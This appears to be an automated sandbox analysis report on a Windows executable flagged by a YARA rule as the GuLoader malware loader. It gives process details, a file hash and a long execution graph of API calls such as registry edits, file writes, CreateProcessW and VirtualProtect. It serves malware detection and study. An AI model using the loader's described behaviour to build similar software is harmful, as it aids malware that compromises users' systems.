                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NEZN6n3s1JFE47Nyot9GMA">*{margin:0;padding:0}html,code{font:15px/22px arial



                                                        Target ID:0
                                                        Start time:11:57:11
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
                                                        Imagebase:0x400000
                                                        File size:534'840 bytes
                                                        MD5 hash:01B2B1469623862352F36C9A1D2CA1D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2354906620.0000000006A84000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:11:57:22
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
                                                        Imagebase:0x400000
                                                        File size:534'840 bytes
                                                        MD5 hash:01B2B1469623862352F36C9A1D2CA1D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3502635941.0000000003614000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:20.1%
                                                          Dynamic/Decrypted Code Coverage:13.9%
                                                          Signature Coverage:18.7%
                                                          Total number of Nodes:1521
                                                          Total number of Limit Nodes:41
4018dc 4373->4375 4376 405f6a 18 API calls 4374->4376 4377 405f6a 18 API calls 4375->4377 4378 4018d1 lstrcatW 4376->4378 4379 4018e4 4377->4379 4378->4379 4381 405724 MessageBoxIndirectW 4379->4381 4381->4370 4382->4364 4382->4370 4383->4360 4385 403072 SetFilePointer 4384->4385 4386 40308e 4384->4386 4385->4386 4405 40317d GetTickCount 4386->4405 4389 405c37 ReadFile 4390 4030ae 4389->4390 4391 40317d 43 API calls 4390->4391 4398 40188d 4390->4398 4392 4030c5 4391->4392 4393 4030d5 4392->4393 4394 40313f ReadFile 4392->4394 4392->4398 4396 405c37 ReadFile 4393->4396 4397 403108 WriteFile 4393->4397 4393->4398 4394->4398 4396->4393 4397->4393 4397->4398 4398->4368 4398->4372 4399->4352 4400->4351 4402 405739 4401->4402 4403 405785 4402->4403 4404 40574d MessageBoxIndirectW 4402->4404 4403->4360 4404->4403 4406 4032e7 4405->4406 4407 4031ac 4405->4407 4408 402d1a 33 API calls 4406->4408 4418 40330f SetFilePointer 4407->4418 4414 403095 4408->4414 4410 4031b7 SetFilePointer 4416 4031dc 4410->4416 4414->4389 4414->4398 4415 403271 WriteFile 4415->4414 4415->4416 4416->4414 4416->4415 4417 4032c8 SetFilePointer 4416->4417 4419 4032f9 4416->4419 4422 4063ee 4416->4422 4429 402d1a 4416->4429 4417->4406 4418->4410 4420 405c37 ReadFile 4419->4420 4421 40330c 4420->4421 4421->4416 4423 406413 4422->4423 4426 40641b 4422->4426 4423->4416 4424 4064a2 GlobalFree 4425 4064ab GlobalAlloc 4424->4425 4425->4423 4425->4426 4426->4423 4426->4424 4426->4425 4427 406522 GlobalAlloc 4426->4427 4428 406519 GlobalFree 4426->4428 4427->4423 4427->4426 4428->4427 4430 402d43 4429->4430 4431 402d2b 4429->4431 4433 402d53 GetTickCount 4430->4433 4434 402d4b 4430->4434 4432 402d34 DestroyWindow 4431->4432 4437 402d3b 4431->4437 4432->4437 4436 402d61 4433->4436 4433->4437 4444 4062eb 4434->4444 4438 402d96 CreateDialogParamW ShowWindow 4436->4438 4439 402d69 4436->4439 4437->4416 4438->4437 4439->4437 4448 402cfe 4439->4448 4441 402d77 wsprintfW 4442 4051f2 25 API calls 4441->4442 4443 
402d94 4442->4443 4443->4437 4445 406308 PeekMessageW 4444->4445 4446 406318 4445->4446 4447 4062fe DispatchMessageW 4445->4447 4446->4437 4447->4445 4449 402d0d 4448->4449 4450 402d0f MulDiv 4448->4450 4449->4450 4450->4441 4451 402253 4452 402261 4451->4452 4453 40225b 4451->4453 4455 402b3a 18 API calls 4452->4455 4458 40226f 4452->4458 4454 402b3a 18 API calls 4453->4454 4454->4452 4455->4458 4456 40227d 4457 402b3a 18 API calls 4456->4457 4460 402286 WritePrivateProfileStringW 4457->4460 4458->4456 4459 402b3a 18 API calls 4458->4459 4459->4456 5066 402454 5067 402c44 19 API calls 5066->5067 5068 40245e 5067->5068 5069 402b1d 18 API calls 5068->5069 5070 402467 5069->5070 5071 40248b RegEnumValueW 5070->5071 5072 40247f RegEnumKeyW 5070->5072 5073 402793 5070->5073 5071->5073 5074 4024a4 RegCloseKey 5071->5074 5072->5074 5074->5073 5076 401ed4 5077 402b3a 18 API calls 5076->5077 5078 401edb 5077->5078 5079 40628b 2 API calls 5078->5079 5080 401ee1 5079->5080 5081 401ef2 5080->5081 5083 405e8f wsprintfW 5080->5083 5083->5081 4474 4022d5 4475 402305 4474->4475 4476 4022da 4474->4476 4478 402b3a 18 API calls 4475->4478 4477 402c44 19 API calls 4476->4477 4479 4022e1 4477->4479 4480 40230c 4478->4480 4481 4022eb 4479->4481 4485 402322 4479->4485 4486 402b7a RegOpenKeyExW 4480->4486 4482 402b3a 18 API calls 4481->4482 4484 4022f2 RegDeleteValueW RegCloseKey 4482->4484 4484->4485 4487 402c0e 4486->4487 4491 402ba5 4486->4491 4487->4485 4488 402bcb RegEnumKeyW 4489 402bdd RegCloseKey 4488->4489 4488->4491 4492 4062b2 3 API calls 4489->4492 4490 402c02 RegCloseKey 4495 402bf1 4490->4495 4491->4488 4491->4489 4491->4490 4493 402b7a 3 API calls 4491->4493 4494 402bed 4492->4494 4493->4491 4494->4495 4496 402c1d RegDeleteKeyW 4494->4496 4495->4487 4496->4495 4504 4014d7 4505 402b1d 18 API calls 4504->4505 4506 4014dd Sleep 4505->4506 4508 4029c7 4506->4508 4720 40335a #17 SetErrorMode OleInitialize 4721 4062b2 3 API calls 4720->4721 4722 40339d SHGetFileInfoW 4721->4722 
4795 405f48 lstrcpynW 4722->4795 4724 4033c8 GetCommandLineW 4796 405f48 lstrcpynW 4724->4796 4726 4033da GetModuleHandleW 4727 4033f4 4726->4727 4728 4059c0 CharNextW 4727->4728 4729 403402 CharNextW 4728->4729 4741 403414 4729->4741 4730 403516 4731 40352a GetTempPathW 4730->4731 4797 403326 4731->4797 4733 403542 4734 403546 GetWindowsDirectoryW lstrcatW 4733->4734 4735 40359c DeleteFileW 4733->4735 4737 403326 11 API calls 4734->4737 4805 402dbc GetTickCount GetModuleFileNameW 4735->4805 4736 4059c0 CharNextW 4736->4741 4739 403562 4737->4739 4739->4735 4742 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4739->4742 4740 4035b0 4749 4059c0 CharNextW 4740->4749 4778 403653 4740->4778 4790 403663 4740->4790 4741->4730 4741->4736 4743 403518 4741->4743 4744 403326 11 API calls 4742->4744 4889 405f48 lstrcpynW 4743->4889 4748 403594 4744->4748 4748->4735 4748->4790 4763 4035cf 4749->4763 4751 403772 4754 403815 ExitProcess 4751->4754 4759 4062b2 3 API calls 4751->4759 4752 40367c 4753 405724 MessageBoxIndirectW 4752->4753 4755 40368a ExitProcess 4753->4755 4756 403692 lstrcatW lstrcmpiW 4761 4036ae CreateDirectoryW SetCurrentDirectoryW 4756->4761 4756->4790 4757 40362d 4760 405a9b 18 API calls 4757->4760 4762 403785 4759->4762 4764 403639 4760->4764 4765 4036d1 4761->4765 4766 4036c6 4761->4766 4767 4062b2 3 API calls 4762->4767 4763->4756 4763->4757 4764->4790 4890 405f48 lstrcpynW 4764->4890 4902 405f48 lstrcpynW 4765->4902 4901 405f48 lstrcpynW 4766->4901 4768 40378e 4767->4768 4771 4062b2 3 API calls 4768->4771 4773 403797 4771->4773 4775 4037b5 4773->4775 4781 4037a5 GetCurrentProcess 4773->4781 4774 403648 4891 405f48 lstrcpynW 4774->4891 4779 4062b2 3 API calls 4775->4779 4777 405f6a 18 API calls 4780 403710 DeleteFileW 4777->4780 4835 40391f 4778->4835 4782 4037ec 4779->4782 4783 40371d CopyFileW 4780->4783 4792 4036df 4780->4792 4781->4775 4785 403801 ExitWindowsEx 4782->4785 4787 40380e 4782->4787 4783->4792 4784 403766 4788 
405de2 40 API calls 4784->4788 4785->4754 4785->4787 4786 405de2 40 API calls 4786->4792 4789 40140b 2 API calls 4787->4789 4788->4790 4789->4754 4892 40382d 4790->4892 4791 405f6a 18 API calls 4791->4792 4792->4777 4792->4784 4792->4786 4792->4791 4794 403751 CloseHandle 4792->4794 4903 4056c3 CreateProcessW 4792->4903 4794->4792 4795->4724 4796->4726 4798 4061dc 5 API calls 4797->4798 4800 403332 4798->4800 4799 40333c 4799->4733 4800->4799 4801 405993 3 API calls 4800->4801 4802 403344 CreateDirectoryW 4801->4802 4906 405be3 4802->4906 4910 405bb4 GetFileAttributesW CreateFileW 4805->4910 4807 402dff 4834 402e0c 4807->4834 4911 405f48 lstrcpynW 4807->4911 4809 402e22 4810 4059df 2 API calls 4809->4810 4811 402e28 4810->4811 4912 405f48 lstrcpynW 4811->4912 4813 402e33 GetFileSize 4814 402f34 4813->4814 4832 402e4a 4813->4832 4815 402d1a 33 API calls 4814->4815 4816 402f3b 4815->4816 4818 402f77 GlobalAlloc 4816->4818 4816->4834 4914 40330f SetFilePointer 4816->4914 4817 4032f9 ReadFile 4817->4832 4822 402f8e 4818->4822 4819 402fcf 4820 402d1a 33 API calls 4819->4820 4820->4834 4824 405be3 2 API calls 4822->4824 4823 402f58 4825 4032f9 ReadFile 4823->4825 4827 402f9f CreateFileW 4824->4827 4828 402f63 4825->4828 4826 402d1a 33 API calls 4826->4832 4829 402fd9 4827->4829 4827->4834 4828->4818 4828->4834 4913 40330f SetFilePointer 4829->4913 4831 402fe7 4833 403062 46 API calls 4831->4833 4832->4814 4832->4817 4832->4819 4832->4826 4832->4834 4833->4834 4834->4740 4836 4062b2 3 API calls 4835->4836 4837 403933 4836->4837 4838 403939 4837->4838 4839 40394b 4837->4839 4924 405e8f wsprintfW 4838->4924 4840 405e15 3 API calls 4839->4840 4841 40397b 4840->4841 4842 40399a lstrcatW 4841->4842 4845 405e15 3 API calls 4841->4845 4844 403949 4842->4844 4915 403bf5 4844->4915 4845->4842 4848 405a9b 18 API calls 4849 4039cc 4848->4849 4850 403a60 4849->4850 4853 405e15 3 API calls 4849->4853 4851 405a9b 18 API calls 4850->4851 4852 403a66 4851->4852 4854 403a76 LoadImageW 
4852->4854 4856 405f6a 18 API calls 4852->4856 4855 4039fe 4853->4855 4857 403b1c 4854->4857 4858 403a9d RegisterClassW 4854->4858 4855->4850 4859 403a1f lstrlenW 4855->4859 4863 4059c0 CharNextW 4855->4863 4856->4854 4862 40140b 2 API calls 4857->4862 4860 403ad3 SystemParametersInfoW CreateWindowExW 4858->4860 4861 403b26 4858->4861 4864 403a53 4859->4864 4865 403a2d lstrcmpiW 4859->4865 4860->4857 4861->4790 4866 403b22 4862->4866 4867 403a1c 4863->4867 4869 405993 3 API calls 4864->4869 4865->4864 4868 403a3d GetFileAttributesW 4865->4868 4866->4861 4871 403bf5 19 API calls 4866->4871 4867->4859 4870 403a49 4868->4870 4872 403a59 4869->4872 4870->4864 4873 4059df 2 API calls 4870->4873 4874 403b33 4871->4874 4925 405f48 lstrcpynW 4872->4925 4873->4864 4876 403bc2 4874->4876 4877 403b3f ShowWindow LoadLibraryW 4874->4877 4878 4052c5 5 API calls 4876->4878 4879 403b65 GetClassInfoW 4877->4879 4880 403b5e LoadLibraryW 4877->4880 4883 403bc8 4878->4883 4881 403b79 GetClassInfoW RegisterClassW 4879->4881 4882 403b8f DialogBoxParamW 4879->4882 4880->4879 4881->4882 4884 40140b 2 API calls 4882->4884 4885 403be4 4883->4885 4886 403bcc 4883->4886 4884->4861 4887 40140b 2 API calls 4885->4887 4886->4861 4888 40140b 2 API calls 4886->4888 4887->4861 4888->4861 4889->4731 4890->4774 4891->4778 4893 403848 4892->4893 4894 40383e CloseHandle 4892->4894 4895 403852 CloseHandle 4893->4895 4896 40385c 4893->4896 4894->4893 4895->4896 4927 40388a 4896->4927 4899 4057d0 71 API calls 4900 40366c OleUninitialize 4899->4900 4900->4751 4900->4752 4901->4765 4902->4792 4904 4056f2 CloseHandle 4903->4904 4905 4056fe 4903->4905 4904->4905 4905->4792 4907 405bf0 GetTickCount GetTempFileNameW 4906->4907 4908 405c26 4907->4908 4909 403358 4907->4909 4908->4907 4908->4909 4909->4733 4910->4807 4911->4809 4912->4813 4913->4831 4914->4823 4916 403c09 4915->4916 4926 405e8f wsprintfW 4916->4926 4918 403c7a 4919 405f6a 18 API calls 4918->4919 4920 403c86 SetWindowTextW 4919->4920 4921 403ca2 
4920->4921 4922 4039aa 4920->4922 4921->4922 4923 405f6a 18 API calls 4921->4923 4922->4848 4923->4921 4924->4844 4925->4850 4926->4918 4928 403898 4927->4928 4929 40389d FreeLibrary GlobalFree 4928->4929 4930 403861 4928->4930 4929->4929 4929->4930 4930->4899 5091 40155b 5092 40296d 5091->5092 5095 405e8f wsprintfW 5092->5095 5094 402972 5095->5094 5096 4038dd 5097 4038e8 5096->5097 5098 4038ec 5097->5098 5099 4038ef GlobalAlloc 5097->5099 5099->5098 5100 40165e 5101 402b3a 18 API calls 5100->5101 5102 401665 5101->5102 5103 402b3a 18 API calls 5102->5103 5104 40166e 5103->5104 5105 402b3a 18 API calls 5104->5105 5106 401677 MoveFileW 5105->5106 5107 401683 5106->5107 5108 40168a 5106->5108 5110 401423 25 API calls 5107->5110 5109 40628b 2 API calls 5108->5109 5112 402197 5108->5112 5111 401699 5109->5111 5110->5112 5111->5112 5113 405de2 40 API calls 5111->5113 5113->5107 3945 4023e0 3956 402c44 3945->3956 3947 4023ea 3960 402b3a 3947->3960 3950 4023fe RegQueryValueExW 3951 40241e 3950->3951 3952 402424 RegCloseKey 3950->3952 3951->3952 3966 405e8f wsprintfW 3951->3966 3953 402793 3952->3953 3957 402b3a 18 API calls 3956->3957 3958 402c5d 3957->3958 3959 402c6b RegOpenKeyExW 3958->3959 3959->3947 3961 402b46 3960->3961 3967 405f6a 3961->3967 3963 4023f3 3963->3950 3963->3953 3966->3952 3982 405f77 3967->3982 3968 4061c2 3969 402b67 3968->3969 4001 405f48 lstrcpynW 3968->4001 3969->3963 3985 4061dc 3969->3985 3971 40602a GetVersion 3971->3982 3972 406190 lstrlenW 3972->3982 3973 405f6a 10 API calls 3973->3972 3976 4060a5 GetSystemDirectoryW 3976->3982 3978 4060b8 GetWindowsDirectoryW 3978->3982 3979 4061dc 5 API calls 3979->3982 3980 405f6a 10 API calls 3980->3982 3981 406131 lstrcatW 3981->3982 3982->3968 3982->3971 3982->3972 3982->3973 3982->3976 3982->3978 3982->3979 3982->3980 3982->3981 3983 4060ec SHGetSpecialFolderLocation 3982->3983 3994 405e15 RegOpenKeyExW 3982->3994 3999 405e8f wsprintfW 3982->3999 4000 405f48 lstrcpynW 3982->4000 3983->3982 3984 
406104 SHGetPathFromIDListW CoTaskMemFree 3983->3984 3984->3982 3986 4061e9 3985->3986 3988 40625f 3986->3988 3989 406252 CharNextW 3986->3989 3992 40623e CharNextW 3986->3992 3993 40624d CharNextW 3986->3993 4002 4059c0 3986->4002 3987 406264 CharPrevW 3987->3988 3988->3987 3990 406285 3988->3990 3989->3986 3989->3988 3990->3963 3992->3986 3993->3989 3995 405e89 3994->3995 3996 405e49 RegQueryValueExW 3994->3996 3995->3982 3997 405e6a RegCloseKey 3996->3997 3997->3995 3999->3982 4000->3982 4001->3969 4003 4059c6 4002->4003 4004 4059dc 4003->4004 4005 4059cd CharNextW 4003->4005 4004->3986 4005->4003 5114 401ce5 GetDlgItem GetClientRect 5115 402b3a 18 API calls 5114->5115 5116 401d17 LoadImageW SendMessageW 5115->5116 5117 401d35 DeleteObject 5116->5117 5118 4029c7 5116->5118 5117->5118 5119 405166 5120 405176 5119->5120 5121 40518a 5119->5121 5122 4051d3 5120->5122 5123 40517c 5120->5123 5124 405192 IsWindowVisible 5121->5124 5130 4051a9 5121->5130 5126 4051d8 CallWindowProcW 5122->5126 5127 4041e6 SendMessageW 5123->5127 5124->5122 5125 40519f 5124->5125 5132 404abc SendMessageW 5125->5132 5129 405186 5126->5129 5127->5129 5130->5126 5137 404b3c 5130->5137 5133 404b1b SendMessageW 5132->5133 5134 404adf GetMessagePos ScreenToClient SendMessageW 5132->5134 5136 404b13 5133->5136 5135 404b18 5134->5135 5134->5136 5135->5133 5136->5130 5146 405f48 lstrcpynW 5137->5146 5139 404b4f 5147 405e8f wsprintfW 5139->5147 5141 404b59 5142 40140b 2 API calls 5141->5142 5143 404b62 5142->5143 5148 405f48 lstrcpynW 5143->5148 5145 404b69 5145->5122 5146->5139 5147->5141 5148->5145 5149 4042e8 lstrlenW 5150 404307 5149->5150 5151 404309 WideCharToMultiByte 5149->5151 5150->5151 5159 100018a9 5160 100018cc 5159->5160 5161 100018ff GlobalFree 5160->5161 5162 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5160->5162 5161->5162 5163 10001272 2 API calls 5162->5163 5164 10001a87 GlobalFree GlobalFree 5163->5164 4266 40206a 4267 402b3a 18 API calls 4266->4267 4268 402071 
4267->4268 4269 402b3a 18 API calls 4268->4269 4270 40207b 4269->4270 4271 402b3a 18 API calls 4270->4271 4272 402084 4271->4272 4273 402b3a 18 API calls 4272->4273 4274 40208e 4273->4274 4275 402b3a 18 API calls 4274->4275 4276 402098 4275->4276 4277 4020ac CoCreateInstance 4276->4277 4278 402b3a 18 API calls 4276->4278 4281 4020cb 4277->4281 4278->4277 4280 402197 4281->4280 4282 401423 4281->4282 4283 4051f2 25 API calls 4282->4283 4284 401431 4283->4284 4284->4280 5165 40156b 5166 401584 5165->5166 5167 40157b ShowWindow 5165->5167 5168 401592 ShowWindow 5166->5168 5169 4029c7 5166->5169 5167->5166 5168->5169 5170 404b6e GetDlgItem GetDlgItem 5171 404bc0 7 API calls 5170->5171 5179 404dd9 5170->5179 5172 404c63 DeleteObject 5171->5172 5173 404c56 SendMessageW 5171->5173 5174 404c6c 5172->5174 5173->5172 5176 404ca3 5174->5176 5178 405f6a 18 API calls 5174->5178 5175 404ebd 5177 404f69 5175->5177 5186 404f16 SendMessageW 5175->5186 5209 404dcc 5175->5209 5180 40419a 19 API calls 5176->5180 5182 404f73 SendMessageW 5177->5182 5183 404f7b 5177->5183 5184 404c85 SendMessageW SendMessageW 5178->5184 5179->5175 5190 404abc 5 API calls 5179->5190 5213 404e4a 5179->5213 5181 404cb7 5180->5181 5185 40419a 19 API calls 5181->5185 5182->5183 5189 404fa4 5183->5189 5195 404f94 5183->5195 5196 404f8d ImageList_Destroy 5183->5196 5184->5174 5191 404cc5 5185->5191 5193 404f2b SendMessageW 5186->5193 5186->5209 5187 404201 8 API calls 5194 40515f 5187->5194 5188 404eaf SendMessageW 5188->5175 5192 405113 5189->5192 5212 404b3c 4 API calls 5189->5212 5217 404fdf 5189->5217 5190->5213 5198 404d9a GetWindowLongW SetWindowLongW 5191->5198 5205 404d15 SendMessageW 5191->5205 5207 404d94 5191->5207 5210 404d51 SendMessageW 5191->5210 5211 404d62 SendMessageW 5191->5211 5199 405125 ShowWindow GetDlgItem ShowWindow 5192->5199 5192->5209 5201 404f3e 5193->5201 5195->5189 5197 404f9d GlobalFree 5195->5197 5196->5195 5197->5189 5200 404db3 5198->5200 5199->5209 5202 404dd1 5200->5202 
5203 404db9 ShowWindow 5200->5203 5206 404f4f SendMessageW 5201->5206 5222 4041cf SendMessageW 5202->5222 5221 4041cf SendMessageW 5203->5221 5205->5191 5206->5177 5207->5198 5207->5200 5209->5187 5210->5191 5211->5191 5212->5217 5213->5175 5213->5188 5214 4050e9 InvalidateRect 5214->5192 5215 4050ff 5214->5215 5223 4049d6 5215->5223 5216 40500d SendMessageW 5220 405023 5216->5220 5217->5216 5217->5220 5219 405097 SendMessageW SendMessageW 5219->5220 5220->5214 5220->5219 5221->5209 5222->5179 5224 4049f3 5223->5224 5225 405f6a 18 API calls 5224->5225 5226 404a28 5225->5226 5227 405f6a 18 API calls 5226->5227 5228 404a33 5227->5228 5229 405f6a 18 API calls 5228->5229 5230 404a64 lstrlenW wsprintfW SetDlgItemTextW 5229->5230 5230->5192 5231 4024ee 5232 4024f3 5231->5232 5233 40250c 5231->5233 5234 402b1d 18 API calls 5232->5234 5235 402512 5233->5235 5236 40253e 5233->5236 5241 4024fa 5234->5241 5237 402b3a 18 API calls 5235->5237 5238 402b3a 18 API calls 5236->5238 5239 402519 WideCharToMultiByte lstrlenA 5237->5239 5240 402545 lstrlenW 5238->5240 5239->5241 5240->5241 5242 402793 5241->5242 5243 402567 WriteFile 5241->5243 5243->5242 5244 4045ee 5245 404624 5244->5245 5246 4045fe 5244->5246 5248 404201 8 API calls 5245->5248 5247 40419a 19 API calls 5246->5247 5249 40460b SetDlgItemTextW 5247->5249 5250 404630 5248->5250 5249->5245 5251 4018ef 5252 401926 5251->5252 5253 402b3a 18 API calls 5252->5253 5254 40192b 5253->5254 5255 4057d0 71 API calls 5254->5255 5256 401934 5255->5256 5257 404970 5258 404980 5257->5258 5259 40499c 5257->5259 5268 405708 GetDlgItemTextW 5258->5268 5261 4049a2 SHGetPathFromIDListW 5259->5261 5262 4049cf 5259->5262 5264 4049b9 SendMessageW 5261->5264 5265 4049b2 5261->5265 5263 40498d SendMessageW 5263->5259 5264->5262 5266 40140b 2 API calls 5265->5266 5266->5264 5268->5263 5269 402770 5270 402b3a 18 API calls 5269->5270 5271 402777 FindFirstFileW 5270->5271 5272 40278a 5271->5272 5273 40279f 5271->5273 5274 4027a8 5273->5274 5277 
405e8f wsprintfW 5273->5277 5278 405f48 lstrcpynW 5274->5278 5277->5274 5278->5272 5279 4014f1 SetForegroundWindow 5280 4029c7 5279->5280 5281 4018f2 5282 402b3a 18 API calls 5281->5282 5283 4018f9 5282->5283 5284 405724 MessageBoxIndirectW 5283->5284 5285 401902 5284->5285 4461 402573 4462 402b1d 18 API calls 4461->4462 4468 402582 4462->4468 4463 4026a0 4464 4025c8 ReadFile 4464->4463 4464->4468 4465 405c37 ReadFile 4465->4468 4466 4026a2 4473 405e8f wsprintfW 4466->4473 4467 402608 MultiByteToWideChar 4467->4468 4468->4463 4468->4464 4468->4465 4468->4466 4468->4467 4470 40262e SetFilePointer MultiByteToWideChar 4468->4470 4471 4026b3 4468->4471 4470->4468 4471->4463 4472 4026d4 SetFilePointer 4471->4472 4472->4463 4473->4463 5286 401df3 5287 402b3a 18 API calls 5286->5287 5288 401df9 5287->5288 5289 402b3a 18 API calls 5288->5289 5290 401e02 5289->5290 5291 402b3a 18 API calls 5290->5291 5292 401e0b 5291->5292 5293 402b3a 18 API calls 5292->5293 5294 401e14 5293->5294 5295 401423 25 API calls 5294->5295 5296 401e1b ShellExecuteW 5295->5296 5297 401e4c 5296->5297 5303 100016b6 5304 100016e5 5303->5304 5305 10001b18 22 API calls 5304->5305 5306 100016ec 5305->5306 5307 100016f3 5306->5307 5308 100016ff 5306->5308 5309 10001272 2 API calls 5307->5309 5310 10001726 5308->5310 5311 10001709 5308->5311 5314 100016fd 5309->5314 5312 10001750 5310->5312 5313 1000172c 5310->5313 5315 1000153d 3 API calls 5311->5315 5317 1000153d 3 API calls 5312->5317 5316 100015b4 3 API calls 5313->5316 5318 1000170e 5315->5318 5320 10001731 5316->5320 5317->5314 5319 100015b4 3 API calls 5318->5319 5321 10001714 5319->5321 5322 10001272 2 API calls 5320->5322 5323 10001272 2 API calls 5321->5323 5324 10001737 GlobalFree 5322->5324 5325 1000171a GlobalFree 5323->5325 5324->5314 5326 1000174b GlobalFree 5324->5326 5325->5314 5326->5314 5327 10002238 5328 10002296 5327->5328 5330 100022cc 5327->5330 5329 100022a8 GlobalAlloc 5328->5329 5328->5330 5329->5328 4692 4026f9 4693 402700 
4692->4693 4696 402972 4692->4696 4694 402b1d 18 API calls 4693->4694 4695 40270b 4694->4695 4697 402712 SetFilePointer 4695->4697 4697->4696 4698 402722 4697->4698 4700 405e8f wsprintfW 4698->4700 4700->4696 5331 1000103d 5332 1000101b 5 API calls 5331->5332 5333 10001056 5332->5333 5334 402c7f 5335 402c91 SetTimer 5334->5335 5336 402caa 5334->5336 5335->5336 5337 402cf8 5336->5337 5338 402cfe MulDiv 5336->5338 5339 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5338->5339 5339->5337 5341 4014ff 5342 401507 5341->5342 5344 40151a 5341->5344 5343 402b1d 18 API calls 5342->5343 5343->5344 5345 401000 5346 401037 BeginPaint GetClientRect 5345->5346 5347 40100c DefWindowProcW 5345->5347 5348 4010f3 5346->5348 5350 401179 5347->5350 5351 401073 CreateBrushIndirect FillRect DeleteObject 5348->5351 5352 4010fc 5348->5352 5351->5348 5353 401102 CreateFontIndirectW 5352->5353 5354 401167 EndPaint 5352->5354 5353->5354 5355 401112 6 API calls 5353->5355 5354->5350 5355->5354 5356 401a00 5357 402b3a 18 API calls 5356->5357 5358 401a09 ExpandEnvironmentStringsW 5357->5358 5359 401a1d 5358->5359 5361 401a30 5358->5361 5360 401a22 lstrcmpW 5359->5360 5359->5361 5360->5361 5362 401b01 5363 402b3a 18 API calls 5362->5363 5364 401b08 5363->5364 5365 402b1d 18 API calls 5364->5365 5366 401b11 wsprintfW 5365->5366 5367 4029c7 5366->5367 4263 100027c7 4264 10002817 4263->4264 4265 100027d7 VirtualProtect 4263->4265 4265->4264 5375 401f08 5376 402b3a 18 API calls 5375->5376 5377 401f0f GetFileVersionInfoSizeW 5376->5377 5378 401f36 GlobalAlloc 5377->5378 5379 401f8c 5377->5379 5378->5379 5380 401f4a GetFileVersionInfoW 5378->5380 5380->5379 5381 401f59 VerQueryValueW 5380->5381 5381->5379 5382 401f72 5381->5382 5386 405e8f wsprintfW 5382->5386 5384 401f7e 5387 405e8f wsprintfW 5384->5387 5386->5384 5387->5379 5388 401c8e 5389 402b1d 18 API calls 5388->5389 5390 401c94 IsWindow 5389->5390 5391 4019f0 5390->5391 5392 1000164f 5393 10001516 GlobalFree 5392->5393 5396 10001667 5393->5396 
5394 100016ad GlobalFree 5395 10001682 5395->5394 5396->5394 5396->5395 5397 10001699 VirtualFree 5396->5397 5397->5394 5405 401491 5406 4051f2 25 API calls 5405->5406 5407 401498 5406->5407 4497 402295 4498 402b3a 18 API calls 4497->4498 4499 4022a4 4498->4499 4500 402b3a 18 API calls 4499->4500 4501 4022ad 4500->4501 4502 402b3a 18 API calls 4501->4502 4503 4022b7 GetPrivateProfileStringW 4502->4503 4509 401f98 4510 401faa 4509->4510 4520 40205c 4509->4520 4511 402b3a 18 API calls 4510->4511 4512 401fb1 4511->4512 4514 402b3a 18 API calls 4512->4514 4513 401423 25 API calls 4518 402197 4513->4518 4515 401fba 4514->4515 4516 401fd0 LoadLibraryExW 4515->4516 4517 401fc2 GetModuleHandleW 4515->4517 4519 401fe1 4516->4519 4516->4520 4517->4516 4517->4519 4532 40631e WideCharToMultiByte 4519->4532 4520->4513 4523 401ff2 4526 402011 4523->4526 4527 401ffa 4523->4527 4524 40202b 4525 4051f2 25 API calls 4524->4525 4528 402002 4525->4528 4535 10001759 4526->4535 4529 401423 25 API calls 4527->4529 4528->4518 4530 40204e FreeLibrary 4528->4530 4529->4528 4530->4518 4533 406348 GetProcAddress 4532->4533 4534 401fec 4532->4534 4533->4534 4534->4523 4534->4524 4536 10001789 4535->4536 4577 10001b18 4536->4577 4538 10001790 4539 100018a6 4538->4539 4540 100017a1 4538->4540 4541 100017a8 4538->4541 4539->4528 4626 10002286 4540->4626 4609 100022d0 4541->4609 4546 100017cd 4547 1000180c 4546->4547 4548 100017ee 4546->4548 4552 10001812 4547->4552 4553 1000184e 4547->4553 4639 100024a9 4548->4639 4550 100017be 4551 100017c4 4550->4551 4556 100017cf 4550->4556 4551->4546 4620 100028a4 4551->4620 4558 100015b4 3 API calls 4552->4558 4560 100024a9 10 API calls 4553->4560 4554 100017d7 4554->4546 4636 10002b5f 4554->4636 4555 100017f4 4650 100015b4 4555->4650 4630 10002645 4556->4630 4563 10001828 4558->4563 4564 10001840 4560->4564 4567 100024a9 10 API calls 4563->4567 4568 10001895 4564->4568 4661 1000246c 4564->4661 4566 100017d5 4566->4546 4567->4564 4568->4539 4572 1000189f 
